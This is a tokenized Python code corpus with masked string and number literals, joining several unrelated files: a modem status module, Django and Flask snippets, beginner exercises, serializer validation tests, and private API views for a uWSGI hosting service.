) <EOL> sleep ( self . modem_timeout ) <EOL> n = ser . inWaiting ( ) <EOL> modem_response = ser . read ( n ) <EOL> ser . close ( ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = self . format_error . format ( <EOL> error = "<STR_LIT>" + self . modem ) <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> return response <EOL> for line in modem_response . decode ( "<STR_LIT:utf-8>" ) . split ( '<STR_LIT:\n>' ) : <EOL> print ( line ) <EOL> if line . startswith ( target_line ) : <EOL> ip = self . _get_ip ( self . interface ) <EOL> if not ip : <EOL> ip = "<STR_LIT>" <EOL> modem_answer = line . split ( '<STR_LIT:U+002C>' ) <EOL> netgen = len ( modem_answer [ - <NUM_LIT:2> ] ) + <NUM_LIT:1> <EOL> netmode = modem_answer [ - <NUM_LIT:1> ] . rstrip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if netmode == "<STR_LIT>" : <EOL> response [ '<STR_LIT>' ] = self . format_no_service . format ( <EOL> status = netmode , <EOL> ip = ip ) <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> else : <EOL> response [ '<STR_LIT>' ] = self . format_up . format ( <EOL> status = netmode , <EOL> netgen = str ( netgen ) + "<STR_LIT>" , <EOL> ip = ip ) <EOL> if netgen <= degraded_netgen : <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> else : <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> elif line . startswith ( "<STR_LIT>" ) or line . startswith ( <EOL> "<STR_LIT>" ) : <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> response [ '<STR_LIT>' ] = self . format_error . format ( <EOL> error = "<STR_LIT>" ) <EOL> else : <EOL> pass <EOL> else : <EOL> print ( self . modem + "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> response [ '<STR_LIT>' ] = self . format_down <EOL> return response <EOL> def _get_ip ( self , interface ) : <EOL> """<STR_LIT>""" <EOL> if interface in ni . interfaces ( ) : <EOL> addresses = ni . ifaddresses ( interface ) <EOL> if ni . AF_INET in addresses : <EOL> return addresses [ ni . AF_INET ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> return "<STR_LIT>" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> x = Py3status ( ) <EOL> config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> while True : <EOL> print ( x . wwan_status ( [ ] , config ) ) <EOL> sleep ( <NUM_LIT:1> ) </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import AbstractUser <EOL> class BadgifyUser ( AbstractUser ) : <EOL> love_python = models . BooleanField ( default = False ) <EOL> love_js = models . BooleanField ( default = False ) <EOL> love_java = models . BooleanField ( default = False ) </s>
<s> import django <EOL> from django . conf import settings <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if django . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> update_fields = lambda instance , fields : instance . save ( update_fields = fields ) <EOL> from django . contrib . auth import get_user_model <EOL> else : <EOL> update_fields = lambda instance , fields : instance . save ( ) <EOL> def get_user_model ( ) : <EOL> from django . contrib . auth . models import User <EOL> return User <EOL> AUTH_USER_MODEL = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from django . utils . encoding import python_2_unicode_compatible <EOL> from django . utils . functional import cached_property <EOL> def _get_translation_field_names ( ) : <EOL> """<STR_LIT>""" <EOL> from . models import Translation <EOL> fields = Translation . _meta . get_all_field_names ( ) <EOL> fields . remove ( '<STR_LIT:id>' ) <EOL> return fields <EOL> try : <EOL> from django . utils . lru_cache import lru_cache <EOL> get_translation_field_names = lru_cache ( ) ( _get_translation_field_names ) <EOL> except ImportError : <EOL> from django . utils . functional import memoize <EOL> get_translation_field_names = memoize ( _get_translation_field_names , { } , <NUM_LIT:0> ) <EOL> @ python_2_unicode_compatible <EOL> class CachedTranslation ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . fields = get_translation_field_names ( ) <EOL> attrs = self . fields + [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for attr in attrs : <EOL> setattr ( self , attr , None ) <EOL> self . __dict__ . update ( ** kwargs ) <EOL> self . is_new = True <EOL> self . has_changed = False <EOL> if self . instance is not None : <EOL> self . identifier = self . instance . linguist_identifier <EOL> self . object_id = self . instance . pk <EOL> if self . translation is not None : <EOL> self . is_new = bool ( self . translation . pk is None ) <EOL> for attr in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> setattr ( self , attr , getattr ( self . translation , attr ) ) <EOL> @ cached_property <EOL> def attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k , getattr ( self , k ) ) for k in self . fields ) <EOL> @ cached_property <EOL> def lookup ( self ) : <EOL> """<STR_LIT>""" <EOL> lookup = dict ( ( k , getattr ( self , k ) ) for k in self . fields ) <EOL> lookup . pop ( '<STR_LIT>' ) <EOL> return lookup <EOL> @ classmethod <EOL> def from_object ( cls , obj ) : <EOL> """<STR_LIT>""" <EOL> instance = cls ( ** dict ( ( field , getattr ( obj , field ) ) <EOL> for field in get_translation_field_names ( ) ) ) <EOL> instance . is_new = False <EOL> return instance <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . identifier , <EOL> self . object_id , <EOL> self . field_name , <EOL> self . language ) </s>
<s> version = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> __version__ = '<STR_LIT:.>' . join ( map ( str , version ) ) <EOL> default_app_config = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:version>' , <EOL> ] </s>
<s> from services import root_dir , nice_json <EOL> from flask import Flask <EOL> from werkzeug . exceptions import NotFound <EOL> import json <EOL> app = Flask ( __name__ ) <EOL> with open ( "<STR_LIT>" . format ( root_dir ( ) ) , "<STR_LIT:r>" ) as f : <EOL> showtimes = json . load ( f ) <EOL> @ app . route ( "<STR_LIT:/>" , methods = [ '<STR_LIT:GET>' ] ) <EOL> def hello ( ) : <EOL> return nice_json ( { <EOL> "<STR_LIT>" : "<STR_LIT:/>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' ] ) <EOL> def showtimes_list ( ) : <EOL> return nice_json ( showtimes ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' ] ) <EOL> def showtimes_record ( date ) : <EOL> if date not in showtimes : <EOL> raise NotFound <EOL> print showtimes [ date ] <EOL> return nice_json ( showtimes [ date ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app . run ( port = <NUM_LIT> , debug = True ) </s>
<s> class Car ( object ) : <EOL> condition = "<STR_LIT>" <EOL> def __init__ ( self , model , color , mpg ) : <EOL> self . model = model <EOL> self . color = color <EOL> self . mpg = mpg <EOL> def display_car ( self ) : <EOL> return "<STR_LIT>" % ( self . color , self . model , str ( self . mpg ) ) <EOL> my_car = Car ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT> ) <EOL> print my_car . display_car ( ) </s>
<s> from datetime import datetime <EOL> print datetime . datetime </s>
<s> zoo_animals = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> del zoo_animals [ '<STR_LIT>' ] <EOL> del zoo_animals [ '<STR_LIT>' ] <EOL> del zoo_animals [ '<STR_LIT>' ] <EOL> zoo_animals [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> print zoo_animals </s>
<s> lloyd = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> alice = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> tyler = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> def average ( numbers ) : <EOL> total = sum ( numbers ) <EOL> total = float ( total ) / float ( len ( numbers ) ) <EOL> return total </s>
<s> from random import randint <EOL> board = [ ] <EOL> for x in range ( <NUM_LIT:0> , <NUM_LIT:5> ) : <EOL> board . append ( [ "<STR_LIT:O>" ] * <NUM_LIT:5> ) <EOL> def print_board ( board ) : <EOL> for row in board : <EOL> print "<STR_LIT:U+0020>" . join ( row ) <EOL> print_board ( board ) <EOL> def random_row ( board ) : <EOL> return randint ( <NUM_LIT:0> , len ( board ) - <NUM_LIT:1> ) <EOL> def random_col ( board ) : <EOL> return randint ( <NUM_LIT:0> , len ( board [ <NUM_LIT:0> ] ) - <NUM_LIT:1> ) <EOL> ship_row = random_row ( board ) <EOL> ship_col = random_col ( board ) <EOL> guess_row = int ( raw_input ( "<STR_LIT>" ) ) <EOL> guess_col = int ( raw_input ( "<STR_LIT>" ) ) <EOL> print ship_row <EOL> print ship_col <EOL> if guess_row == ship_row and guess_col == ship_col : <EOL> print "<STR_LIT>" </s>
<s> def digit_sum ( n ) : <EOL> b = [ ] <EOL> n = str ( n ) <EOL> for a in n : <EOL> a = int ( a ) <EOL> b . append ( a ) <EOL> return sum ( b ) <EOL> print sum ( b ) </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> from __future__ import unicode_literals <EOL> from django . test import TestCase <EOL> from rest_framework import serializers <EOL> from rest_framework_mongoengine . serializers import DocumentSerializer <EOL> from . models import DumbDocument <EOL> class ValidationMethodSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> def validate_name ( self , value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> return value . title ( ) <EOL> class RenamedValidationMethodSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> renamed = serializers . CharField ( source = '<STR_LIT:name>' , required = False ) <EOL> def validate_renamed ( self , value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> return value . title ( ) <EOL> def custom_field_validator ( value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> class FieldValidatorSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> name = serializers . CharField ( validators = [ custom_field_validator ] ) <EOL> def custom_model_validator ( data ) : <EOL> if len ( data [ '<STR_LIT:name>' ] ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> class ModelValidatorSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> validators = [ custom_model_validator ] <EOL> class TestValidating ( TestCase ) : <EOL> def test_validation_method_is_executed ( self ) : <EOL> serializer = ValidationMethodSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT:name>' in serializer . errors <EOL> def test_validation_method_passing ( self ) : <EOL> serializer = ValidationMethodSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors <EOL> assert serializer . validated_data [ '<STR_LIT:name>' ] == "<STR_LIT>" <EOL> def test_renamed_validation_method_is_executed ( self ) : <EOL> serializer = RenamedValidationMethodSerializer ( data = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT>' in serializer . errors <EOL> def test_renamed_validation_method_passing ( self ) : <EOL> serializer = RenamedValidationMethodSerializer ( data = { '<STR_LIT>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors <EOL> assert serializer . validated_data [ '<STR_LIT:name>' ] == "<STR_LIT>" <EOL> def test_validator_is_executed ( self ) : <EOL> serializer = FieldValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT:name>' in serializer . errors <EOL> def test_validator_passing ( self ) : <EOL> serializer = FieldValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors <EOL> def test_validators_is_executed ( self ) : <EOL> serializer = ModelValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT>' in serializer . errors <EOL> def test_validators_passing ( self ) : <EOL> serializer = ModelValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors </s>
<s> from debug_toolbar . panels import Panel <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from . import uwsgi <EOL> class UwsgiPanel ( Panel ) : <EOL> """<STR_LIT>""" <EOL> title = _ ( '<STR_LIT>' ) <EOL> nav_title = _ ( '<STR_LIT>' ) <EOL> template = '<STR_LIT>' <EOL> @ property <EOL> def nav_subtitle ( self ) : <EOL> if uwsgi is not None : <EOL> status = _ ( '<STR_LIT>' ) % ( <EOL> uwsgi . version , uwsgi . numproc ) <EOL> else : <EOL> status = _ ( '<STR_LIT>' ) <EOL> return status <EOL> def process_response ( self , request , response ) : <EOL> if uwsgi is None : <EOL> self . record_stats ( { '<STR_LIT>' : True } ) <EOL> else : <EOL> from . stats import get_uwsgi_stats <EOL> self . record_stats ( get_uwsgi_stats ( ) ) </s>
<s> from django . http import HttpResponse , HttpResponseForbidden <EOL> from django . template . loader import render_to_string <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> from uwsgi_it_api . utils import spit_json , check_body <EOL> from uwsgi_it_api . decorators import need_certificate <EOL> from uwsgi_it_api . models import * <EOL> from uwsgi_it_api . config import UWSGI_IT_BASE_UID <EOL> import json <EOL> import datetime <EOL> @ need_certificate <EOL> @ csrf_exempt <EOL> def private_server_file_metadata ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> j = json . loads ( request . read ( ) ) <EOL> metadata = ServerFileMetadata . objects . get ( filename = j [ '<STR_LIT:file>' ] ) <EOL> sm , created = ServerMetadata . objects . get_or_create ( server = server , metadata = metadata ) <EOL> sm . value = j [ '<STR_LIT:value>' ] <EOL> sm . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> files = [ ] <EOL> for _file in ServerFileMetadata . objects . all ( ) : <EOL> files . append ( _file . filename ) <EOL> return spit_json ( request , files ) <EOL> except : <EOL> import sys <EOL> print sys . exc_info ( ) <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_custom_services ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> j = [ { '<STR_LIT>' : service . customer . pk , '<STR_LIT>' : service . config , '<STR_LIT>' : service . munix , '<STR_LIT:id>' : service . pk } for service in server . customservice_set . all ( ) ] <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_containers ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> j = [ { '<STR_LIT>' : container . uid , '<STR_LIT>' : container . munix , '<STR_LIT>' : container . ssh_keys_munix } for container in server . container_set . exclude ( distro__isnull = True ) . exclude ( ssh_keys_raw__exact = '<STR_LIT>' ) . exclude ( ssh_keys_raw__isnull = True ) ] <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_loopboxes ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> j = [ { '<STR_LIT:id>' : loopbox . pk , '<STR_LIT>' : loopbox . container . uid , '<STR_LIT:filename>' : loopbox . filename , '<STR_LIT>' : loopbox . mountpoint , '<STR_LIT>' : loopbox . ro } for loopbox in Loopbox . objects . filter ( container__server = server ) ] <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_portmappings ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> unix = server . portmappings_munix <EOL> pmappings = [ ] <EOL> for portmap in Portmap . objects . filter ( container__server = server ) : <EOL> pmappings . append ( { <EOL> '<STR_LIT>' : portmap . proto , <EOL> '<STR_LIT>' : str ( portmap . container . server . address ) , <EOL> '<STR_LIT>' : portmap . public_port , <EOL> '<STR_LIT>' : str ( portmap . container . ip ) , <EOL> '<STR_LIT>' : portmap . private_port , <EOL> } ) <EOL> if portmap . munix > unix : <EOL> unix = portmap . munix <EOL> j = { '<STR_LIT>' : unix , '<STR_LIT>' : pmappings } <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_container_ini ( request , id ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if not container . distro or not container . ssh_keys_raw : raise Exception ( "<STR_LIT>" ) <EOL> j = render_to_string ( '<STR_LIT>' , { '<STR_LIT>' : container } ) <EOL> return HttpResponse ( j , content_type = "<STR_LIT>" ) <EOL> except : <EOL> import sys <EOL> print sys . exc_info ( ) <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_container_ssh_keys ( request , id ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if not container . distro or not container . ssh_keys_raw : raise Exception ( "<STR_LIT>" ) <EOL> return HttpResponse ( container . ssh_keys_raw , content_type = "<STR_LIT>" ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_legion_nodes ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> nodes = [ ] <EOL> unix = server . munix <EOL> if server . legion_set . count ( ) > <NUM_LIT:0> : <EOL> for node in server . legion_set . first ( ) . nodes . all ( ) : <EOL> if node . address != server . address : <EOL> if node . munix > unix : unix = node . munix <EOL> nodes . append ( node . address ) <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : unix , '<STR_LIT>' : nodes } ) , content_type = "<STR_LIT>" ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_nodes ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> nodes = [ ] <EOL> unix = server . munix <EOL> for node in Server . objects . all ( ) : <EOL> if node . address != server . address : <EOL> if node . munix > unix : unix = node . munix <EOL> nodes . append ( node . address ) <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : unix , '<STR_LIT>' : nodes } ) , content_type = "<STR_LIT>" ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_domains_rsa ( request ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> server_customers = Customer . objects . filter ( container__server = server ) <EOL> j = [ ] <EOL> for customer in server_customers : <EOL> domains = [ ] <EOL> for domain in customer . domain_set . all ( ) : <EOL> domains . append ( { '<STR_LIT:name>' : domain . name , '<STR_LIT>' : domain . munix } ) <EOL> j . append ( { '<STR_LIT>' : customer . rsa_pubkey , '<STR_LIT>' : domains } ) <EOL> return spit_json ( request , j ) <EOL> def private_metrics_domain_do ( request , id , metric ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> j = json . loads ( request . read ( ) ) <EOL> d = datetime . datetime . fromtimestamp ( int ( j [ '<STR_LIT>' ] ) ) <EOL> domain = Domain . objects . get ( name = j [ '<STR_LIT>' ] , customer = container . customer ) <EOL> try : <EOL> m = metric . objects . get ( domain = domain , container = container , year = d . year , month = d . month , day = d . day ) <EOL> except : <EOL> m = metric ( domain = domain , container = container , year = d . year , month = d . month , day = d . day , json = '<STR_LIT>' ) <EOL> m_json = json . loads ( m . json ) <EOL> m_json . append ( [ int ( j [ '<STR_LIT>' ] ) , long ( j [ '<STR_LIT:value>' ] ) ] ) <EOL> m . json = json . dumps ( m_json ) <EOL> m . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> else : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_domain_net_rx ( request , id ) : <EOL> return private_metrics_domain_do ( request , id , NetworkRXDomainMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_domain_net_tx ( request , id ) : <EOL> return private_metrics_domain_do ( request , id , NetworkTXDomainMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_domain_hits ( request , id ) : <EOL> return private_metrics_domain_do ( request , id , HitsDomainMetric ) <EOL> def private_metrics_container_do ( request , id , metric ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> j = json . loads ( request . read ( ) ) <EOL> d = datetime . datetime . fromtimestamp ( int ( j [ '<STR_LIT>' ] ) ) <EOL> try : <EOL> m = metric . objects . get ( container = container , year = d . year , month = d . month , day = d . day ) <EOL> except : <EOL> m = metric ( container = container , year = d . year , month = d . month , day = d . day , json = '<STR_LIT>' ) <EOL> m_json = json . loads ( m . json ) <EOL> m_json . append ( [ int ( j [ '<STR_LIT>' ] ) , long ( j [ '<STR_LIT:value>' ] ) ] ) <EOL> m . json = json . dumps ( m_json ) <EOL> m . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> else : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_mem ( request , id ) : <EOL> return private_metrics_container_do ( request , id , MemoryContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_mem_rss ( request , id ) : <EOL> return private_metrics_container_do ( request , id , MemoryRSSContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_mem_cache ( request , id ) : <EOL> return private_metrics_container_do ( request , id , MemoryCacheContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_cpu ( request , id ) : <EOL> return private_metrics_container_do ( request , id , CPUContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_io_read ( request , id ) : <EOL> return private_metrics_container_do ( request , id , IOReadContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_io_write ( request , id ) : <EOL> return private_metrics_container_do ( request , id , IOWriteContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_net_rx ( request , id ) : <EOL> return private_metrics_container_do ( request , id , NetworkRXContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_net_tx ( request , id ) : <EOL> return private_metrics_container_do ( request , id , NetworkTXContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_quota ( request , id ) : <EOL> return private_metrics_container_do ( request , id , QuotaContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_alarms ( request , id ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if request . method != '<STR_LIT:POST>' : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> msg = request . read ( ) <EOL> if '<STR_LIT>' in request . GET : <EOL> d = datetime . datetime . fromtimestamp ( int ( request . GET [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> d = datetime . datetime . now ( ) <EOL> alarm = Alarm ( container = container , unix = d ) <EOL> alarm . level = <NUM_LIT:0> <EOL> alarm . msg = msg <EOL> alarm . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response </s>
<s> import argparse <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> from management_tools import loggers <EOL> class ChDir : <EOL> def __init__ ( self , newPath ) : <EOL> self . savedPath = os . getcwd ( ) <EOL> os . chdir ( newPath ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> os . chdir ( self . savedPath ) <EOL> def set_globals ( ) : <EOL> '''<STR_LIT>''' <EOL> global options <EOL> options = { } <EOL> options [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> options [ '<STR_LIT:name>' ] = '<STR_LIT:_>' . join ( options [ '<STR_LIT>' ] . lower ( ) . split ( ) ) <EOL> options [ '<STR_LIT:version>' ] = '<STR_LIT>' <EOL> def setup_logger ( ) : <EOL> '''<STR_LIT>''' <EOL> global logger <EOL> if options [ '<STR_LIT>' ] : <EOL> if not options [ '<STR_LIT>' ] : <EOL> logger = loggers . file_logger ( options [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> logger = loggers . file_logger ( options [ '<STR_LIT:name>' ] , path = options [ '<STR_LIT>' ] ) <EOL> else : <EOL> logger = loggers . stream_logger ( <NUM_LIT:1> ) <EOL> def parse_options ( ) : <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:version>' , version = options [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + options [ '<STR_LIT:version>' ] , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> options [ '<STR_LIT:input>' ] = args . input <EOL> options [ '<STR_LIT>' ] = args . output <EOL> options [ '<STR_LIT>' ] = not args . no_log <EOL> options [ '<STR_LIT>' ] = args . log <EOL> def main ( ) : <EOL> set_globals ( ) <EOL> parse_options ( ) <EOL> setup_logger ( ) <EOL> if not options [ '<STR_LIT:input>' ] : <EOL> options [ '<STR_LIT:input>' ] = '<STR_LIT>' <EOL> else : <EOL> options [ '<STR_LIT:input>' ] = os . path . expanduser ( options [ '<STR_LIT:input>' ] ) <EOL> if not os . path . isdir ( options [ '<STR_LIT:input>' ] ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> options [ '<STR_LIT:input>' ] = os . path . abspath ( options [ '<STR_LIT:input>' ] ) <EOL> if not options [ 